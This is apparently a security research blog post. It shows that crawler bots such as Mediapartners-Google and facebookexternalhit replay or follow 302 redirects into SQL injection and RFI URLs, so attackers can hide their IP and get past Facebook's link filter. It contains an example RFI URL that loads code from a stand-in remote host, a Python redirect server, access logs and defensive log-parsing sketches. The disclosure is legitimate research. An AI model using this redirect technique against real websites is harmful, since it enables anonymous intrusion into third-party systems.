Some months ago, I became interested in suspicious alerts generated on our honeynet that were related to the dedicated Google AdSense “Mediapartners-Google*” bot.
If the web page first invoked by the visitor contains SQL injection, RFI, LFI or XSS URL parameters, the Mediapartners bot will replay the attack. So if you are vulnerable to these web attacks, you will get owned first by the visitor who invoked the vulnerable URL, then by the Mediapartners bot, which copies the visitor's action. I tested with SQL injection and RFI vulnerabilities, and every time my lab was owned a second time by the Mediapartners bot.
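On the defensive side, this replay pattern can be spotted in your own logs. The following is only a rough sketch, assuming Python and assuming the hits have already been extracted from the access log; the names `Hit`, `looks_like_attack` and `find_replays`, the list of suspicious substrings and the 60 second window are all illustrative assumptions, not how our honeynet actually raises its alerts.

```python
from typing import NamedTuple
from urllib.parse import urlsplit, parse_qsl

BOT_MARKER = "Mediapartners-Google"  # substring of the bot's User-Agent


class Hit(NamedTuple):
    timestamp: float  # seconds, any monotonic reference
    user_agent: str
    url: str          # path plus query string, as logged


def looks_like_attack(url: str) -> bool:
    """Crude heuristic (assumption): flag query values that embed a URL (RFI),
    a path traversal (LFI), a quote or UNION SELECT (SQLi) or a script tag (XSS)."""
    needles = ("http://", "https://", "ftp://", "../", "'", "union select", "<script")
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        lowered = value.lower()
        if any(needle in lowered for needle in needles):
            return True
    return False


def find_replays(hits, window=60.0):
    """Return (visitor_hit, bot_hit) pairs where the bot requested the same
    suspicious URL within `window` seconds after a non-bot visitor did."""
    last_visitor = {}
    replays = []
    for hit in sorted(hits, key=lambda h: h.timestamp):
        if not looks_like_attack(hit.url):
            continue
        if BOT_MARKER in hit.user_agent:
            first = last_visitor.get(hit.url)
            if first is not None and hit.timestamp - first.timestamp <= window:
                replays.append((first, hit))
        else:
            last_visitor[hit.url] = hit
    return replays
```

A heuristic like this will produce false positives (any parameter holding a legitimate URL is flagged), so it is better suited to a honeypot than to a production site.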
This bot behavior is interesting, because you might need a web attack that requires two steps: the first is performed by the visitor's call, the second by the bot. For example, with an RFI vulnerability (http://www.example.com/test.php?id=http://www.proxy.com/id.txt), the visitor's first call executes the “id.txt” code; directly after that execution, the original id.txt code could be automatically replaced by different code, which is then called by the Mediapartners copycat bot.
The Mediapartners bot is not a “classical” search engine bot. A “classical” search engine bot visits your website depending on its popularity, and surely other criteria, so you have no control over when it will come to visit you. In 2001, lcamtuf (aka Michal Zalewski) published a Phrack article, “Rise of the Robots”, which demonstrated that classical search engines, with their natural “link following” behavior, could also take part in hacking vulnerable websites. Just create a web page with thousands of SQL injection or RFI links, and the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam”. But as described by lcamtuf, you do not control the timeline of the bot's visits.
With the Mediapartners bot you still have one problem: the first invocation of the web page reveals your source IP, so the attack is not transparent.
“Classical” search engine bots have interesting features; for example, they can react to 301 or 302 HTTP redirections. So you can redirect certain bots wherever you want. Just take a look at the following code, and replace “Bots” with a bot fingerprint:
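A minimal sketch of such a User-Agent based redirection, written here in Python, which is not necessarily the language of the test page I used. The names `BOT_FINGERPRINT`, `TARGET_URL`, `respond` and `serve`, the port and the page body are assumptions made for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

BOT_FINGERPRINT = "Bots"                # placeholder: replace with a bot's User-Agent substring
TARGET_URL = "http://www.example.com/"  # hypothetical redirect destination


def respond(user_agent):
    """Return (status, headers, body) for a request with the given User-Agent."""
    if BOT_FINGERPRINT.lower() in (user_agent or "").lower():
        # Matching bots get a 302 and are sent elsewhere.
        return 302, {"Location": TARGET_URL}, b""
    # Everyone else gets an ordinary page.
    body = b"<html><body>Some random text</body></html>"
    return 200, {"Content-Type": "text/html"}, body


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, body = respond(self.headers.get("User-Agent"))
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port=8000):
    """Run the test page on localhost until interrupted."""
    HTTPServer(("127.0.0.1", port), Handler).serve_forever()
```

Calling `serve()` starts the page locally; keeping the decision in `respond` makes it easy to check which User-Agent strings would be redirected without starting a server.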
I tested the 302 redirection with the most common search engine bots, and saw that most of them are “vulnerable”.
- msnbot-media
184.108.40.206 - - [14/Jan/2011:21:56:38 +0100] "GET /random_url.php HTTP/1.1" 302 236957 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
220.127.116.11 - - [14/Jan/2011:21:56:40 +0100] "GET /robots.txt HTTP/1.1" 200 74 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
18.104.22.168 - - [14/Jan/2011:21:56:41 +0100] "GET / HTTP/1.1" 200 15146 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
- bingbot
22.214.171.124 - - [14/Jan/2011:22:34:49 +0100] "GET /random_url.php HTTP/1.1" 302 19847 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
126.96.36.199 - - [14/Jan/2011:22:34:50 +0100] "GET /robots.txt HTTP/1.1" 200 74 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
188.8.131.52 - - [14/Jan/2011:22:34:51 +0100] "GET / HTTP/1.1" 200 15146 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
- Yahoo! Slurp
184.108.40.206 - - [16/Jan/2011:09:08:55 +0100] "GET /random_url.php HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
- Googlebot-Image
220.127.116.11 - - [14/Jan/2011:22:09:02 +0100] "GET /random_url.php HTTP/1.1" 302 71861 "-" "Googlebot-Image/1.0"
Every time, the bots executed the web attacks, and they were the only source IP of the attack. There is no need to reveal yourself directly for web hacking; the search engine bots will do the job for you. But as I explained, you have no control over when these bots are invoked.
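If you want to check your own access logs for bots that were answered with a 302, something like the following could be a starting point. It is a sketch in Python that assumes the Apache Combined Log Format; `parse_line`, `redirected_bots` and the list of User-Agent markers are illustrative names and choices, and the typographic clean-up is only there because curly quotes and en dashes often creep into logs pasted on a blog.

```python
import re

# Combined Log Format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Map curly quotes and en dashes back to their plain ASCII forms.
TYPO_FIX = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2013": "-"})


def parse_line(line):
    """Return a dict of log fields, or None if the line does not match."""
    match = LOG_RE.match(line.strip().translate(TYPO_FIX))
    return match.groupdict() if match else None


def redirected_bots(lines, markers=("bot", "slurp", "mediapartners", "facebookexternalhit")):
    """Yield (ip, user_agent, path) for 302 responses served to bot-like agents."""
    for line in lines:
        entry = parse_line(line)
        if entry is None or entry["status"] != "302":
            continue
        agent = entry["agent"].lower()
        if any(marker in agent for marker in markers):
            yield entry["ip"], entry["agent"], entry["path"]
```

Feeding it an open log file, for example `list(redirected_bots(open("access.log")))` with a hypothetical file name, gives the list of bot requests that were redirected.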
After some research I discovered that the Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you can control it by redirecting it wherever you want.
Here is the result. I still have to invoke the bot first, but the bot is then redirected to the target URL, hiding my source IP.
18.104.22.168 - - [13/Jan/2011:00:27:40 +0100] "GET /random_URL.php HTTP/1.1" 200 1290 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10"
22.214.171.124 - - [13/Jan/2011:00:27:42 +0100] "GET /random_URL.php HTTP/1.1" 302 1288 "-" "Mediapartners-Google"
126.96.36.199 - - [13/Jan/2011:00:27:42 +0100] "GET / HTTP/1.1" 200 15146 "-" "Mediapartners-Google"
What is interesting is that the Mediapartners bot's source IP on the C&C server is not the same as its source IP on the target server. The Mediapartners bots share orders between different source servers.
I now have a fully controllable bot: time and target are customizable. It is quite simple to create a C&C back-end that generates random web pages on demand and invokes the bot. After more tests, I found that the Mediapartners bot supports not only the HTTP and HTTPS protocols, but also FTP.
188.8.131.52 - - [15/Jan/2011:00:19:26 +0100] "GET /random_URL.php HTTP/1.1" 302 91754 "-" "Mediapartners-Google"
# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
00:19:27.956865 IP 184.108.40.206.43666 > xxx.xxx.xxx.xxx.ftp: S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP xxx.xxx.xxx.xxx.ftp > 220.127.116.11.43666: S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP 18.104.22.168.43666 > xxx.xxx.xxx.xxx.ftp: . ack 1 win 92
00:19:27.973972 IP xxx.xxx.xxx.xxx.ftp > 22.214.171.124.43666: P 1:266(265) ack 1 win 91
00:19:27.989653 IP 126.96.36.199.43666 > xxx.xxx.xxx.xxx.ftp: . ack 266 win 108
00:19:27.989864 IP 188.8.131.52.43666 > xxx.xxx.xxx.xxx.ftp: P 1:17(16) ack 266 win 108
00:19:27.989894 IP xxx.xxx.xxx.xxx.ftp > 184.108.40.206.43666: . ack 17 win 91
00:19:27.990238 IP xxx.xxx.xxx.xxx.ftp > 220.127.116.11.43666: F 266:266(0) ack 17 win 91
00:19:28.005937 IP 18.104.22.168.43666 > xxx.xxx.xxx.xxx.ftp: F 17:17(0) ack 267 win 108
00:19:28.005975 IP xxx.xxx.xxx.xxx.ftp > 22.214.171.124.43666: . ack 18 win 91
Is the Mediapartners bot the only fully controllable bot? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here is the description of the bot:
“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”
When you publish a URL in your Facebook wall status, the “facebookexternalhit” bot fetches the URL and caches the content for later delivery. So you have control over the bot's invocation. Facebook has some security mechanisms that do not permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in its parameters.
But the “facebookexternalhit” bot is also vulnerable to 302 redirection, which allows you to bypass the security mechanism.
126.96.36.199 - - [14/Jan/2011:22:40:57 +0100] "GET /random_URL.php HTTP/1.1" 302 65629 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
188.8.131.52 - - [14/Jan/2011:22:40:58 +0100] "GET / HTTP/1.1" 200 9545 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
Just publish a “normal” link in your Facebook status; the bot will fetch the page and be directly redirected, for example, to a SQL injection URL. What is funny is that the result of the web attack will be displayed on your wall 🙂
A lot of bots are vulnerable to different attacks. You never see them, but be careful with them. I would like to thank jduck from the Metasploit team for providing me with some useful information.